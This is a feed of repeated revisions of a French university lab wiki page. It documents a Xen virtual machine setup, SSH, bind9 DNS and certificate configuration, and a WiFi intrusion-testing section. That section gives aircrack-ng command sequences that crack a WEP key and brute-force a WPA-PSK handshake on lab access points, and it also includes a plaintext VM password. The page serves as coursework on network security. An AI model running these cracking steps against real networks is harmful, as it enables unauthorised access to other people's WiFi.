		<summary type="html">&lt;p&gt;Rbonvale : /* Certificat */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56698</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56698"/>
				<updated>2021-11-29T17:32:46Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* Machine Virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
Tout d'abord on réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56642</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56642"/>
				<updated>2021-11-29T16:26:28Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
Tout d'abord on réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
